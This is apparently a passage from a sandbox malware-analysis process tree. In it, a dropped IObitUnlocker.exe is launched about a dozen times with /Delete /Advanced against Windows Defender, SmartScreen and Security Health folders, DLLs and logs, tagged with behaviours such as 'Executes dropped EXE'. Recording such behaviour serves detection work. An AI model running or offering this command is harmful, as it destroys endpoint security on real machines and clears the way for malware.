                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4328
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1544
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5696
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5264
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4676
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:6068
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1736
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1592
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3568
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3528
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5044
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
